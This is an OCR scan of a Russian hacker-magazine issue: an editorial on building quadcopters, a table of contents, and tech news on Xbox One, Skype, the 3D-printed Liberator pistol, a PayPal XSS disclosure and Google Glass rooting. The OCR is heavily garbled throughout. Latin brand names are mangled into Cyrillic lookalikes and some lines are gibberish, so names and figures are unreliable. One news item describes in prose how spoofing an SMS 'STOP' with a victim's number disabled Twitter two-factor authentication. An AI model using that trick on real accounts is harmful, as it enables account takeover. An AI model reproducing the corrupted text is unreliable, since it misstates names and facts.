Интерес к любительской электронике и ОМ становится все 
более массовым, и различные игрушки становятся все 
доступнее. На этот раз в центре — мультикоптеры, радио- 
управляемые летательные аппараты. 

Игрушечные вертолеты и самолеты — тема далеко 
не новая, но с появлением выносливых, функциональных 
и расширяемых «взрослых» моделей идея получает прин- 
ципиально новое развитие. Мультикоптеры уже зарекомен- 
довали себя в съемке — с воздуха можно делать отличные 
панорамы и забираться в труднодоступные места для самых 
неожиданных кадров. Если посмотреть тематические фору- 
мы, то уже сейчас есть множество интересных конфигура- 
ций: аппараты на солнечных батареях, автономные машины 
или даже гибриды мультикоптера с гексаподом, способные 
передвигаться как по земле, так и по воздуху. 

Самый простой способ познакомиться с миром этих чуд- 
ных машин — АВ.Огопе Ратоф, известный многим. Как часто 
бывает с популярными продуктами в нишевых областях, эта 
модель имеет массу ограничений, отчасти компенсируемых 
большим сообществом и кучей продуктов. Но поскольку лег- 
ких путей мы не ищем, мы рассмотрели и самый трушный 
вариант — сборку собственной модели. 

Удивительно, но, несмотря на всю популярность, сборка 
квадрокоптеров по-прежнему остается непростой задачей. 
Нельзя просто составить список компонентов и давать его 
всем желающим, как это происходит, например, со сборкой 
компов. Одни и те же компоненты могут продаваться под 
разными именами или иметь разные характеристики — все 
это просто не достигло достаточно зрелой стадии. В общем, 
подготовить готовую конфигурацию почти невозможно. 

Но вот объяснить логику при составлении такой конфигура- 
ции вполне реально, что мы и сделали в этом номере. 

Вероятно, через год мы еще раз вернемся к этой теме — 
производители каждый месяц афишируют новые модели 
готовых аппаратов по цене от 50 до 150 долларов. Воз- 
можно, что и здесь появится собственный ВазрЬегту Р!или 
Агацто — не идеальный, но простой и доступный аппарат, 
который легко адаптировать для своих проектов. 


Илья Илембитов, 
шеф-редактор Х 
чулеег.сот/ЛетЬКоу 
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ДЛЯ ИКАРА 


Учимся собирать собственный квадрокоптер 


У 


НЕ УСПЕЛ 
ТАТТЕВ ВВЕСТИ 
ДВУХФАКТОРНУЮ 
АВТОРИЗАЦИЮ, 
КАК ЕЕТУТ ЖЕ 
НАУЧИЛИСЬ 
ОБХОДИТЬ 


КРЫЛАТЫЕ \ № 
ДРУЗЬЯ 


Бюджетные квадрокоптеры 


ХИТВ НЕБЕ 


АВ.Огопе 2.0 и самые популярные 
аддоны для него 


007МРР, 
СООСНОВАТЕЛЬ ОМ$ЕС 


Заработать можно на чем угодно. Если ты хочешь денег, 
ты вряд ли станешь заниматься безопасностью — 
это, пожалуй, самый трудоемкий и глупый способ :) 


МЕСАМЕМ!/$ 


КОЛОНКА СТЁПЫ ИЛЬИНА 
РВООЕ-ОЕ-СОМСЕРТ 

ЛАЙФХАКИ ДЛЯ ИКАРА 

КРЫЛАТЫЕ ДРУЗЬЯ 

ХИТВ НЕБЕ 

БЕЛАЯ ШЛЯПА 

ТРУБНЫЙ РЕБЕНОК 

В ДЕБРЯХ НЕОО!Т 

СВИТА КОРОЛЯ 

МАЛЕНЬКИЙ СИЛАЧ 

НАЧАТЬ С КОНЦА 

ЕАЗУ НАСК 

ОБЗОР ЭКСПЛОЙТОВ 

1000 $ НАВЗЛОМЕ ПРИЛОЖЕНИЙ 
ИНСТРУМЕНТАЦИЯ — ЭВОЛЮЦИЯ АНАЛИЗА 
НОРМАЛЬНЫЕ ГЕРОИ ВСЕГДА ИДУТВ ОБХОД! 
КОЛОНКА АЛЕКСЕЯ СИНЦОВА 
СТАРЫЙ НОВЫЙ ИМ$ЕВ!АН7Е 
ГРУЗИТЕ ФАЙЛЫ ПАЧКАМИ! 
Х-ТО0Е5$ 

ДЕТЕКТИМ ВИРТУАЛКИ 

ЗАДАЧИ НА СОБЕСЕДОВАНИЯХ 
КУШАТЬ ПОДАНО! 

АМСИТАВУ$: ФРЕЙМВОРК, КОТОРЫЙ НАМ НРАИЦА 
ПРАВИЛЬНАЯ МНОГОПОТОЧНОСТЬ 
ПУБЛИЧНАЯ ПОРКА ПИНГВИНА 
ОГНЕННЫЙ ЗАНАВЕС 

БУБЕН НА ПРОКАЧКУ 

СПОСОБНЫЕ ПОДМАСТЕРЬЯ 
РАБОЧИЕ ЛОШАДКИ 

ГАО 

ДИСКО 

М/МГМ!2 
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Все новое за последний месяц 

Какя учил Вибу оп Ва!5$ затри ночи. Итаки не выучил 

Смартфоны с камерами как детектор грязной бомбы 

Как спроектировать собственный квадрокоптер 

Бюджетные квадрокоптеры 

АВ.Огопе 2.0: обзор возможностей и дополнений 

Интервью с известным российским мйКе паГом 907прр 

Как объединять веб-сервисы в новые инструменты 

Откуда начать читать 

Обзор тиз{ Пауе инструментов для рутованного Апаго!а 

Или как выжать максимум из мини-компа на базе Апагога 

Обзор Зопу Хрепа 2 

Хакерские секреты простых вещей 

Анализ свеженьких уязвимостей 

Ищем уязвимости в Апаго-приложениях Яндекса 

Система Ри навооружении 

Руководство по лечению сертифицированной криптографии в банковских приложениях 
Зачем вам ЕМЕТ 

Свежие способы эксплуатации РНР Ошес песйоп 

Заливаем полезную нагрузку на машину под управлением \\Ип40\5 

Тутилит для исследователей безопасности 

Определяем факт запуска приложения в различных системах виртуализации 
Подборка интересных заданий, которые даютна собеседованиях 

Используем Сгип1 для облегчения жизни фронтенд-разработчика 

Новая жизнь старого Чамазсир\, к которому тоже приложилась корпорация добра! 
«Да» — плавности, «нет» — блокировкам! 

Обзор самых опасных, неоднозначных и дурацких уязвимостей вядре Ипих 
Новые и малоизвестные возможности р{аез$ 

Погурманим? Необычные рецепты в помощь админам 

Обзор полезных дополнений и инструментов для популярных приложений Муз СЕ, Мад!о$ и $пой 
Сравнительное тестирование ноутбуков средней ценовой категории на базе МИптдо\м 8 
Вопросы и ответы 

8,5 Гб всякой всячины 


Удобные меб-сервисы 


МЕ\Л 


Новость месяца 


Мария «МИг» 
Нефёдова 
ши @геа!.хаКер.ги 


ОВЫЙ «Я ПИК Х» 
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ажется, переплюнуть презентацию Р!ауЗфаНоп 4 
по странности не могло уже ничто: говорить о кон- 
соли три часа, так и не показав консоль, тоже нужно 
уметь. Мисго$ой консоль все-таки показала, но шоу 
все равно оказалось странным. 

Большая часть часовой презентации Х1 была 
посвящена «новому видению мультимедиа» 
от Мсго5оН, и фокус делался на том, как консоль 

сможет управлять телевизором и различными приставками 
кабельного и спутникового телевидения. Вместо того чтобы по- 
казать, как новое железо и облачная инфраструктура позволят 
создавать игры нового поколения, М'сго$оН показала трейлеры 
с рендерами игр (не показывая сам игровой процесс). Да и вы- 
бор игр не впечатлил, ведь спортивные игры от ЕА и очередная 
Са! оЕОщу — не самая большая сенсация на свете. 

Цена устройства пока неизвестна, но технические харак- 
теристики огласили. Консоль работает на восьмиядерном 
СРУ/СРЧ, оснащается 8 Гб ОЗУ ООАЗ, приводом Ву-гау, вин- 
честером на 500 Гб, интерфейсом УЗВ 3.0 и поддержкой про- 
токола \\/1-Н! Отест. В качестве процессора используется АРУ 


семейства АМО Кафп!. Как предполагают аналитики 
Апапесп, это конфигурация из двух четырехъядер- 
ных процессоров, работающих на частоте 1,6 ГГц, 
но официально это подтверждено не было. 

Если вспомнить презентации консолей прошло- 
го поколения, тогда Мсго$ой и Зопу действительно 
было чем удивить: игры на больших НО-телевизорах 
в то время были в диковинку. Даже сейчас, несмотря 
на то что железо обеих приставок безнадежно уста- 
рело, разработчикам по-прежнему удается удивить 
игроков — ведь на большом экране все выглядит 
по определению лучше. С новым поколением такого 
резкого скачка продемонстрировать не удалось — 
возможно, поэтому разработчики предпочли в пер- 
вую очередь говорить о мультимедиа. 

У приставок остался козырь в виде облачных 
вычислений. М!сго$ой даст разработчикам доступ 
к платформе \\паом/5 Агиге, на которой можно об- 
считывать по крайней мере те элементы графики, 
которые не требуют частого обновления (например, 

пейзажи). У Зопу же собствен- 

ная платформа Сашжа!. Инте- 

ресно, что произойдет, когда 

в конце года на рынок выйдут 

У Зеатрох, ведь \Ма№е на игро- 

(= вых сервисах уж точно собаку 
съела. 


ХВОХ ОМЕ 


Сенсор Ктес+{: онте- 
перь снимаетвидео 
1080р, обрабатывая 
поток 2 Гбит/с, лучше 
понимаетжесты и... 
сможет распознавать 
выражение лица, 
сердцебиение геймера 
и даже определять его 
центр тяжести. Более 
того, без Ктес+систе- 
маработать не будет, 
ионвсегда должен 
быть включен. В том 
числе камераи микро- 
фон. Якобы вожидании 
команды отпользова- 
теля. Верим-верим. 


Иллюстрация: Майя Арутюнова 
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ОБХОД 
ДВУХФАКТОРНОЙ 
АВТОРИЗАЦИИ 
ТУМТТЕР 


СТАРЫЙ МЕТОД ДЛЯ НОВЫХ РЕШЕНИЙ 


осле недавней череды громких взломов аккаунтов 
в мег (от рук хакеров за последние месяцы пострада- 
ли Аззосчаеа Рге5$, Те Сиаг ап и АЕР) сервис наконец 
ввел в строй систему двухфакторной авторизации. Од- 
нако спустя пару дней после этого события в Сети уже 
появилась информация о том, что ее можно обойти. 

Подробную статью о возможных уязвимостях системы опубли- 
ковал Шон Салливан из компании Е-Зесиге. Двухфакторную аутен- 
тификацию в Тм Щег можно подключить или отключить одновремен- 
но с услугой получения твитов на мобильный телефон. Здесь-то 
и кроется загвоздка. Давно известно, что отправка твитов на мо- 
бильный легко поддается 5$М$-спуфингу. По сути, для прекраще- 
ния услуги нужно просто отправить ЗМ$ со словом ЗЭТОР на номер 
Тмищег в своей стране, указав в качестве обратного телефона номер 
жертвы. Вуаля, у жертвы отключилась доставка твитов на телефон 
и/или двухфакторная авторизация. Салливан не поленился проте- 
стировать свою теорию и оказался абсолютно прав. Путем описан- 
ных манипуляций ему удалось без проблем отключить двухфактор- 
ную авторизацию на чужом аккаунте. 

В своей статье Салливан также отмечает, что люди, использую- 
щие двухфакторную систему авторизации, обычно чувствуют себя 
защищеннее, расслабляются и выбирают очень простые пароли. 
А значит, их опять же будет проще взломать. 


ь Кстати, ТилИегтеперь 
в режиме реального 


времени отслеживает 
по записям пользова- 
телей, какиетелепро- 
граммы они смотрят, 
и соотносит это 

с данными орекламе 
в эфире. Послечего 
демонстрирует поль- 
зователютурекламу, 
которую тот только 
что видел. 


Мч5@(- 


ЧИТАЕТЛИ НАС 
МСВОЗОЕТ? 


СНОВАВСПЛЫЛ ВОПРОС О БЕЗОПАСНОСТИ И ЗАЩИЩЕННОСТИ 


а этот раз интерес к проблеме потенциальной незащищенно- 
сти ЗКуре-чата продемонстрировали немецкие исследователи, 
а именно издательский дом Назе. Снова Мсго5оН подозревают 
в слежке за пользователями. 

Известно, что несколько юзеров провели опыт: принялись об- 
мениваться ссылками в ЗКуре, как в открытую, так и специально модифици- 
руя их различными ЧА -сократителями, через ЧаумаЗсир{ и иными способами. 
Выяснилось странное: периодически ссылки доходили до адресата в изме- 
ненном или сокращенном виде, успевая по пути видоизмениться. Предста- 
вители Нее утверждают, что подобное невозможно провернуть, «не заглянув 
внутрь чужого сообщения» тем или иным путем. Собственное расследование 
журналистов показало, что в процессе каким-то образом задействован сер- 
вер, поддерживающий маршрутизацию сообщений и работающий по 1Р- 
адресу 65.52.100.214. Этот Р входит в сеть, принадлежащую Мгсго$о8Н. 

В МсгозоЙ прокомментировали ситуацию, сообщив, что действительно 
«читают» сообщения, но исключительно ЧУН! -фильтром, который ищет вре- 
доносные ссылки. Сам фильтр якобы даже не переходит по линкам, а лишь 
сверяет их с базой. 


—> МАКреа!а решила отказаться 
от использования Му$ ОЕ, ее 
заменит МапабВ. Более того, ос- 
новная часть бесшовной миграции 
МузЗОЕ — Мапа)В уже выполнена. 


—> Первый в мире видеокодек, 
созданный на базе ]Чауа$сир+ 

и М!еб СЕ, представили Мо7а 
Роипдайоп и компания ОТО\,. Кодек 
ОАВХ.|$ был написан как замена 
Н.264. 


—> В—Нсот и ММебМопеу по- 
дружились. Теперь в кошельках 
\МебМопеу появится поддержка 


ввода, вывода и конвертации ВС. 


1 \ММХ равен 0,001 ВТС. 


—> Билл Гейтс снова объявлен 
самым богатым человеком пла- 
неты, согласно рейтингу Воотрега 
ВИ!опане$ паех. Его состояние 
оценивается в 72,7 миллиарда 
долларов. 


6 МЕ\М/$ 


ДРОНЫ НУЖНЫ 


НЕ ТОЛЬКО 
ВОЕННЫМ 


ИНТЕРЕСНЫЙ И ДОБРЫЙ СТАРТАП 


ак правило, беспилотные летательные аппараты 

фигурируют в новостях рядом со словами «армия», 

«патрулирование», «опасные зоны» и так далее. Ис- 

следователи из научно-исследовательской лабора- 

тории при Университете сингулярности видят дро- 
нов под другим углом и хотят использовать их в мирных целях. 
Так и появился на свет стартап под названием Мацете. 

Идея проста — использовать беспилотники для транспорти- 
ровки грузов. Да, разумеется, один дрон может поднять всего 
пару килограммов и пронесет их лишь несколько километров 
(десять максимум). Именно для этого ученые и хотят постро- 
ить целую сеть зарядных станций на солнечных батареях, рас- 
положенных на расстоянии не более 10 км друг от друга. Летая 
между ними, дроны смогут заменять старые аккумуляторы или 
подзаряжаться. 

И это нетолько концепт или идея: сеть МаКцетет уже прошла 
пробные испытания на Гаити и в Доминиканской Республике, 
дополнительные тесты запланированы на ближайшее время. 


т 

Е СОТРУДНИКОВ 
ое. УВОЛЕНО 
руюторганизовать 


ИЗ НАРШЪНАНЕ 


Некогда популярнейший файловый 
хостинг сегодня испытывает серьезные 
трудности. ВарАЗПаге были вынуждены 
сократить штат компании с 60 до 15 
человек. Сейчас сайт находится всего 
на 621-м месте среди файловых хостин- 
гов, по данным Аеха. 


оперативный центр 
для наблюдения завсе- 
ми беспилотниками 

в реальном времени, 
чтобы своевременно 
информировать власти 
о пролетающихнад 
ними дронах. 


ДОБРОВОЛЬЦЕВ 
ХОТЯТНА МАРС 


—> Голландская организация Магз Опе, 
решившая первой доставить людей 

на Марс (в частном порядке), преуспе- 
вает. Уже 78 тысяч добровольцев хотят 
попытать счастья, получив билет в один 
конец. Все эти люди уже заплатили по 38 
долларов вступительного взноса. Будет 
на что строить на Марсе базу и космиче- 
ские корабли! 


С 1 августа Соод!е перей- 
детна 2048-битные ключи 
шифрования при работе с 5$1- 
сертификатами. Пока сеансовые 
данные шифруют ключами длиной 
1 Кбит. 


Компания Уапоо! решила 
«омолодить» свою аудиторию 
и покупает ТитЬ! за 1,1 миллиар- 
да долларов. В компании пообе- 
щали «не облажаться». Уапоо! до 
сих пор припоминают ЕйсКг. 


МЕСАМЕ\/$ 
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РАСПЕЧАТАИ СЕБЕ 
ПИСТОЛЕТ 


ЫВЕВАТОВ — ОРУЖИЕ, КОТОРОЕ МОЖНО РАСПЕЧАТАТЬ ДОМА, НА 30 -ПРИНТЕРЕ 


АРьдРай ’. © 


< 2 Я 


Тем временем в Калифорнии 48-летний Джефф Хизель, автор популярного канала ТаоНедегтаи$ 
на УочТивБе, научился печатать на ЗО-принтере Зопаоо4е 3 пластиковые пули для дробовика 
Моз5Бега 590. Даже самая маленькая среди напечатанных из обычного пластика пуль с легкостью 
пробила деревянную доскус десяти метров. 


ажется, люди, громко кричавшие о том, что З9-принтеры могут быть опасны, 
оказались не уж так далеки от правды. Оружейные детали, пригодные к исполь- 
зованию, научились печатать уже сравнительно давно. Теперь научились печа- 
тать оружие в целом. 

/бегафог (освободитель) — первый в мире пластиковый пистолет, все де- 
тали которого отпечатаны на ЗО-принтере. Его создали в некоммерческой организации 
Оеепзе Пибщжеа, чей глава Коди Уилсон называет себя анархистом и радикальным ли- 
бертарианцем. Пистолет состоит из 16 частей, каждая из которых была распечатана авто- 
рами на принтере Оитепзюп $З$Т с использованием АВ$-пластика. Повторить это можно 
практически на любом ЗО-принтере. Металлический в оружии только боек, для которого 
использован обычный гвоздь. Лишь одна 
эта крохотная деталь не может быть соз- 
дана на принтере. И этот кусочек металла, 
в общем-то, нужен скорее для обнаружения 
оружия металлодетекторами, в соответствии 
с американским Упащецаые Егеагтз Аст. 
Кроме того, ИМБегаюг может стрелять патро- 
нами разного калибра, так как создатели 
предусмотрели возможность смены некото- 
рых частей. Здесь стоит отметить, что у ком- 
пании Оёептзе Гибщеа лицензия на произ- 
водство огнестрельного оружия есть, с этой 
стороны все законно и честно. Также по зако- 
нам США гражданин имеет право изготовлять 
у себя дома оружие для собственных нужд. 
Однако кто гарантирует, что печатать писто- 


в интервью Еогбе$ 
Коди Уилсон леты будут только в США, и кто проконтроли- 
рует этот процесс? 


Чертежи (то есть САБ-файлы) Ибегатюг были опубликованы в открытом доступе, на сай- 
те . Конечно же, на компанию ОБеепзе Озибщечд и саму идею тут же обрушил- 
ся шквал критики и негодования. Ведь пластиковое оружие почти невозможно обнаружить 
(можно попросту не вставлять металл в пистолет), а картина подпольных фабрик, печата- 
ющих оружие на ЗО-принтерах, вдруг стала пугающе реальной. Правительство США среа- 
гировало довольно быстро: на данный момент от файлов на сайте осталась лишь надпись, 
гласящая, что госдепартамент США, занимающийся регулированием торговли оружием, 
потребовал убрать данные из открытого доступа. Стоит ли говорить, что пользователям 
это не понравилось? В пику властям люди организовали торрент-раздачи файлов, заяв- 
ляя, что готовы сидировать их просто из принципа. Обсуждение на гедай собрало больше 
трех тысяч комментариев и вышло одним из самых жарких в этом месяце. Но, как извест- 
но, что попало в интернет, то останется там навсегда. «Удалять» данные поздно. Зато теперь 
в США могут запретить пластиковое оружие. 


«Везде, где есть 
компьютер и ин- 
тернет, может 
появиться пи- 
столет», — с гор- 
достью заявил 


Иллюстрация: Майя Арутюнова 


ВИРТУАЛЬНЫЕ 
УГОНЩИКИ НЕПРОЙДУТ 


—> Усоседей в Белоруссии очень серьезная киберпо- 
лиция. Недавно их «управление К» вернуло З0-лет- 
нему военному угнанный у него танк. Да-да, танк был 
виртуальный, из \\опА о{ Тапк$. Угонщик оказался 
школьником, которому теперь грозит штраф за угон 
премиум-танка ценой 35 долларов. 


НУЖНЫ ЛИБОКСОВЫЕ 
ВЕРСИИ? 


—> АдоБе Зузетз сделали важное заявление — ком- 
пания решила отказаться от дистрибуции продуктов 
коробочными продажами, перейдя на облачную 
модель по подписке. Интересно, что почти одно- 
временно с этим Мсго$оЙ сообщила, что, напротив, 
не собирается прекращать продажи коробок. 


МУХ НА ОРБИТЕ 


—> Все компьютеры локальной сети на МКС были 
переведены с М/паом/$ ХР, на которой работали до не- 
давнего времени, на Бешап. Сделали это из сооб- 
ражений безопасности. Впрочем, стоит отметить, 

что Мпих так или иначе используется на орбите с 1998 
года, с самого запуска МСК. 


$ МЕСАМЕ\/$ 


«УРОВЕНЬ ПИРАТСТВА 
СЛИШКОМ ВЫСОК 


ГЕЙМ-ДЕВЕЛОПЕРЫ ПОПЫТАЛИСЬ ДОСТУЧАТЬСЯ ДО ИГРОКОВ 
НЕОБЫЧНЫМ СПОСОБОМ 


мешная, грустная и вместе с тем поучительная история произошла в прошлом 
месяце. Разработчики попытались наглядно продемонстрировать игрокам, 
как это обидно и неприятно, когда пиратство убивает твой бизнес. 

Небольшая инди-студия Огееппеа" Сате$з завершила работу над новым 
проектом — игрой Сате Оеу Тусооп. Это бизнес-симулятор игровой студии, 
где действие начинается с самой зари игровой индустрии — 80-е годы, гараж, разработка 
текстовых игр и двумерной графики. Заканчивается игра созданием ММО, бестселлеров, 
своей компанией и даже выпуском собственной консоли. Однако добраться до победного 
конца удалось немногим, большинство игроков уперлись в странную проблему — высокий, 
просто непомерный уровень пиратства, который задушил их бизнес. Оказалось, это был 
совсем не баг и не недоработка, просто авторы игры решили провести эксперимент. 

Вместе с платной версией симулятора (цена которой составляет всего 7,99 доллара) 
Сгееппеа" Сате$ создали «крякнутую», якобы пиратскую версию Сате Ое\х Тусооп, с не- 
большими изменениями. И тоже выпустили ее в Сеть. Жадные до халявы пользователи 
принялись активно качать игру уже через минуту (!) после регистрации раздачи на трекере. 
А дальше разработчикам осталось только наблюдать за реакцией... 

Возмущение и непонимание последовали в тот же день. На игровых форумах и даже 
в Зеат люди начали жаловаться на то, что какая-то непонятная проблема не дает им про- 
двигаться в игре. Этой проблемой, как ты понимаешь, был чрезмерно высокий уровень пи- 
ратства. Должно быть, разработчики здорово повеселились, наблюдая за тем, как пользо- 
ватели искренне расстраиваются, когда их игра получает высокие оценки, но ее «все равно 
воруют». Некоторые игроки даже интересовались, нельзя ли использовать в игре какие-то 
схемы ОВАМ или нечто подобное. Другие просто возмущались: «Почему среди людей так 
много пиратов? Из-за них я банкрот!» В общем, халявщики наивно искали решение «про- 
блемы» и злились, совершенно не замечая бревна в собственном глазу. 

Итоги эксперимента оказались печальными. Конечно, продажи получились мизерными. 
Но быть может, этот эксперимент хоть чему-то нас научит? 


Игроки интересовались, нельзя ли исполь- 
зовать в игре какие-то схемы РЕМ. Другие 
просто возмущались: «Почему среди людей 
так много пиратов? Из-за них я банкрот!» 
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версию установили 214 
человек, а «пират- 
скую» — 3104 человека, 
то есть уровень пират- 
ства составляет 93,6%. 
Что и требовалось 


доказать. > ба|ез Кером“ 


И 
притие Преу збеы В Бу Фолапбоь НО а Стаса леч абс 
гайпанг Идет Белигыя ебу 


СЫ. РОТ норёщир Горан 5 Я ий В 19 БП абы В оный В 1 г. 


№ равуеся ФолиЕ Би Вене орать Чет Пе, М ЧАИ СЕТ 
са Це сю ВРЖГИрЯ 
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ЕЩЕОДИН НЕДОСТАТОК 
МММ 8 


—> Новозеландский сотрудник «Лаборатории Ка- 
сперского» Уэйн Кирби выступил с критикой в адрес 
\ММпаом/$ 8. По его мнению, система излишне сложна, 
что делает ее более уязвимой. «Система содержит 

в себе сразу три платформы, что открывает путь к зна- 
чительно более широкому фронту атак». 


ЧЛЕНАМ ЦЕ 7ЗЕС 
УЖЕНЕСМЕШНО 


—> Четверым хакерам из группы 1и7Зес, ранее при- 
знавшим себя виновными, вынесли приговор. Бри- 
танский суд приговорил их ктюремному заключению 
на срок от 20 до 32 месяцев. Любопытно, что послед- 
него участника группы (А\уипк) так и не могут найти. 
Его ищут спецслужбы, но он как в воду канул. 


= мевву — 
КАМАНО$ | 


НЕ «ГИФ», А«ДЖИФ» 


—> Автор формата СИЕ Стив Уилхайт дал интервью 
изданию Мем/Уогк Тите$ и сделал неожиданное за- 
явление. Оказывается, все эти годы мы ошибались, 
произнося слово как «гиф». Правильно «джиф» [4951]. 
Даже «Оксфордский словарь английского языка», до- 
пускающий оба произношения, заблуждается. 


МЕСАМЕ\/$ 
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ПУБЛИКУЙ 
УЯЗВИМОСТИ 
НАЗЛО! 


то время как мы рассказываем о рынке продаж уязви- 
мостей, о том, какие деньги на этом делают компании 
и частные лица, некоторые граждане публикуют «дырки» 
в открытом доступе и совершенно бесплатно. Руководят 
ими желание насолить и обида. 

Первого исследователя еще можно понять — он 17-летний 
школьник. Его зовут Роберт Куглер, и он нашел на сайте РауРа! Х$$- 
уязвимость. Вызвать баг можно через встроенную функцию поиска, 
вставив три строки на уауа$ спирт. Парень честно попытался связать- 
ся с РауРа! через форму для профессионалов и получить деньги, 
но получил лишь ответ: «К участию в программе Вид Воиту допу- 
скаются лица не моложе 18 лет». Тогда Куглер обиделся и опублико- 
вал все данные в открытом доступе ( 

). 

Второй случай понять сложнее. Инженер Сооде Тевис Орманди 
обнаружил баг в \Мтаом 7 и 8, позволяющий локальному пользо- 
вателю получить неположенные ему системные полномочия. Уда- 
ленно эту брешь использовать нельзя, поэтому она не слишком 
критична. Орманди попытался донести информацию о найденной 
дырке до Мсгоз$ой, но лишь выяснил, что там к этому относятся 
недружелюбно, помогать не хотят, и дела с ними вести совершен- 
но невозможно. Обо всем этом Орманди рассказал в своем блоге 
и в открытую опубликовал данные о найденном баге ( 


). 


Конечно, невсебаги 


публикуются «назло» 
разработчикам. Кпри- 
меру, датская компания 
Зесита в этом месяце 
разгласила0О-4ау для 
программы ЕВОА$ 

ЕВ Мемег случайно. 
Информация одырке 

и эксплойт попали в от- 
крытую рассылку «из-за 
срабатывания функции 
автозаполнения впо- 
чтовой программе». 


хОвЕр 


М АР р АР 


азработчики Сгумек$ УЗВ еще в декабре 2011 года собрали нема- 
лую сумму 196 404 доллара для реализации своего проекта флеш- 
ки-криптекса с аппаратным шифрованием. 
Сгурек$ УЗВ выглядел красиво на картинках, да и сама идея 
защищать флешку с помощью кодового криптекса очень понрави- 
лась посетителям КскЗащег, так что 989 человек не пожалели денег, чтобы 
заказать 1, 2, 5 или 10 таких устройств. 

Один из покупателей даже заказал комплект из 25 гаджетов за 3750 дол- 
ларов. Теперь всем этим оптимистам остается только кусать локти: авторы 
рендеров, собрав деньги и заказы, некоторое время общались со своими 
«клиентами», но потом им надоело, и с апреля 2013 года представители ком- 
пании Сгурнаае шс. окончательно исчезли с горизонта, перестали отвечать 
на письма и звонки. Обманутые «дольщики» разделились на два лагеря: мол- 
чаливое большинство мысленно попрощалось с деньгами, а неболышная груп- 
па активистов пишет письма по инстанциям и надеется вернуть средства. 
Судя по сообщениям для «дольщиков», компания пыталась осуществить воз- 
врат средств, но то ли не завершила, то ли не начала этот процесс. 

Неудивительно, что после таких историй руководство Кск;ацег сильно 
ужесточило правила для новых проектов. Среди прочего с прошлого года за- 
прещено публиковать рендеры, разрешены только фотографии реально име- 
ющихся прототипов. 


—> 1,3 миллиона игроков 
потеряла ММОРПГ \/опа о{ 
\ММагсгаЕ в первом квартале этого 
года, согласно данным В17гтага. 
Теперь играют лишь 8,3 миллиона 
человек. 


—> Об)о$-атака 300 Гбит/с 

не прошла даром. Свен Олаф 
Кампхейс, один из руководителей 
СубегВипкКег, арестован в Испании 
и отправлен в Нидерланды, где его 
ждет суд. 


—> 178 ПК отправил на помойку 
департамент образования не- 
мецкого города Шверин. Просто 
машины были заражены Сопйскег, 
а антивирусы, видимо, для дура- 
КОВ. 


—> \ММ-Е! скоростью 1,7 Гбит/с? 
Возможно. Компания Оцнащеппа 
анонсировала чип, ориентиро- 
ванный на мобильные девайсы, 
созданный путем модификации 
802. Лас. 


то МЕ\/$ 


БЫЛ ЕЕВОНА. 
СТАЛРРОНА 


НЕОДНОЗНАЧНОЕ ПЕРЕИМЕНОВАНИЕ ИЗВЕСТНОГО ДИСТРИБУТИВА 


астоящая комедия разыгралась в про- 
шлом месяце вокруг популярного дис- 
трибутива Еедога. Дело втом, что разра- 
ботчики решили переименовать проект 
Редога для Вазрбеггу РГи выбрали очень 
неблагозвучное для русскоязычной публики назва- 
ние — Раога. Конечно же, новое имя вызвало нема- 
лый резонанс и потоки юмора разной степени тяже- 
сти в СМИ, форумах, блогах и так далее. Пожалуй, 
любой дистрибутив Мпих мог бы гордиться таким 
вниманием прессы и такой рекламой :). 

Оказалось, все ключевые разработчики этого 
билда для архитектуры ААМ\уб живут в Канаде и сре- 
ди них нет русскоязычных. Однако известие о том, 
что название вышло не слишком удачным, до них 
вскоре докатилось. На официальном сайте проекта 
в итоге появилось сообщение: «Пожалуйста, прими- 
те наши извинения, если мы нанесли вам оскорбле- 
ние. Мы лишь хотели связать „Пи“ (от Вазрбеиту Р!) 
и „Федора“ (из проекта Еедога). Мы активно ищем 
приемлемое для всех альтернативное русское на- 
звание и консультируемся с некоторыми членами 
сообщества. Вскоре опубликуем дополнительную 
информацию по этому поводу». 


Тем временем винфра- 
структуре Еедога нашли 
ошибки в системе управ- 
ления аккаунтами разра- 
ботчиков, очем сообщил 
лидер проекта Робин 
Бергерон. В итоге могла 
произойти утечка данных, 
среди которых могли быть 
хеши паролей ($НА-512 
ссолью), секретные во- 
просы, зашифрованные 
ответы для восстановле- 
ния пароля и персональ- 
ные данные. 


Неврзеныи РУ РА к ИНаИЧЬ 
Метегея быте: 6 з 
Роги ста Гнев биатиюцый 


{е4ого® $ 


рога в 


Гебога 


Рога [5 а Редога Ветих орНилеге Фен Ане Рузеруенентлу РА ссугиерицИненг. 


ь 
ВеТоаттыа Все 
Раса 18: Набциза Аппомиожтьет 
Вела Мини 
Рога УЛ 
Рикый Норовкиу 
РНИИ УСН 
Новою соогыеру 67 
©<@-=— # ЫшеНозе 


ЗАМЪУЧМО ИСПЫТАЛА 
НОВЫЙ СТАНДАРТ 


За, 449? Они еще не успели стать 

до конца привычными, но уже устаревают. 
Компания Затзипа провела испытание 
беспроводной передачи данных уже пятого 
поколения. Удалось послать данные на ско- 
рости более 1 Гб/с на расстояние два кило- 
метра. Для коммерческого использования 
5С станет доступна не ранее 2020 года. 


ДОЛЯ 
ТОРРЕНТ- 
т у ТРАФИКА 
| О ВМИРЕ 


—> Торрент-трафик сдает позиции. 

На данный момент ВЕТотет генерирует 
35% ирюаа-трафика, что меньше, чем 

в прошлые годы, но тоже ощутимо. Однако 
стоит учесть, что 55 -трафик в последний 
год увеличился в два раза: с 2,5 до 5,4%. 
Быть может, пользователи стали умнее 

и просто пользуются \/РМ-сервисами. 


Ученые университета Кон- 
нектикута выяснили: у игроков 
Очцаке 3 Вемуо!ийоп резко повы- 
шается уровень агрессии, если 
их противник человеческой расы. 


Теперь распознаванием 
образов на фото и видео, за- 
гружаемых в Соод/е+, занимается 
мощная самообучаемая нейросеть. 
И заметим, у нее отлично полу- 
чается. 


ТРЕНИЕ УБНОНЕТ 


т2 МЕСАМЕ\/$ 


ПЯТИМИНУ КА 
@О0ООЕЕ ОЁЕАЗЗ 


ВСЕНОВОЕ О ЧУДО-ОЧКАХ ОТСООСЕЕ 


округ амбициозного проекта Сооде С!аз$$ все время что-то происходит, 
и ажиотаж плавно подогревается тем, что отзывов конкретных пользователей 
И «очевидцев» до сих пор очень мало. Представляем тебе подборку наиболее 
интересных новостей из стана проекта. 

Как известно, Соод!е С!а$$ работают под управлением Апагога. Разумеет- 
ся, его попытались взломать. Основатель проекта СуФа Джей Фримен в своем твиттере 
отчитался о том, что сумел получить гоф4{-доступ к операционной системе очков Ехрогег 
ЕЧНюп, предназначенных для разработчиков приложений. Для достижения своей цели 
Фримен воспользовался известным ба- 
гом в Апаго@ 4.0.4 и преуспел. Хакер пи- 
шет, что это было на удивление легко. 
Пока непонятно, сработает ли этот метод 
